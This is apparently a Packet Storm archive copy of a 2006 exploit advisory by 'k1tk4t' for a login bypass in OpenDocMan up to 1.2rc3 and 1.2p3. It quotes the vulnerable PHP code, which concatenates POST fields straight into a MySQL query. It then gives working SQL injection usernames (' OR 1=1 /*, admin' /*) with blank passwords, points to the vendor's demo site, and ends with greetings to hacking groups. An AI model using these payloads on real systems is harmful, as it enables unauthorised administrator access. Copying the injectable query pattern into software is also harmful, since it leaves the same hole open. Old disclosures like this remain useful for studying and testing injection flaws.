opendocman-1.2rc3.txt

2006-10-30T00:00:00
ID PACKETSTORM:51476
Type packetstorm
Reporter k1tk4t
Modified 2006-10-30T00:00:00

Description

                                        
                                            `########################################################################  
# opendocman <= 1.2rc3 Bypass admin/user Login  
# affected to opendocman-1.2p3  
# Download Source : http://www.opendocman.com/  
#  
# Found By : k1tk4t - k1tk4t[4t]newhack.org  
# Location : Indonesia -- #newhack[dot]org @irc.dal.net  
########################################################################  
file;  
index.php  
########################################################################  
bugs;  
$frmuser = $_POST['frmuser'];  
$frmpass = $_POST['frmpass'];  
$query = "SELECT id, username, password FROM user WHERE username =  
'$frmuser' AND password = password('$frmpass')"; $result =  
mysql_query("$query") or die ("Error in query: $query. " . mysql_error());  
$result = mysql_query("$query") or die ("Error in query: $query. "  
. mysql_error());  
########################################################################  
exploit/POC;  
if magic_quotes_gpc = Off -- u can do this;  
  
for opendocman-1.2rc3  
Login administrator  
username : ' OR 1=1 /*  
password : blank  
  
Login User  
username : username' /*  
password : blank  
  
opendocman-1.2p3  
Login Form  
username : admin' /*  
password : blank  
in opendocman-1.2p3 use;  
if(!valid_username($_POST['frmuser']  
so u just bypass login username existing in database  
http://www.opendocman.com/demo/index.php  
########################################################################  
Thanks;  
str0ke  
xoron [www.xoron.biz]  
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159  
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,  
home_edition2001,matdhule,iFX,  
and for all(friend's&enemy)  
@irc.dal.net  
#newhack[dot]org [all member&staff]  
#e-c-h-o [all member echo community]  
#nyubicrew [all member solpotcrew community]  
#asiahacker [all member asiahacker community]  
  
  
--   
best regard'  
  
k1tk4t  
http://newhack.org  
newhack[dot]org@irc.dal.net  
`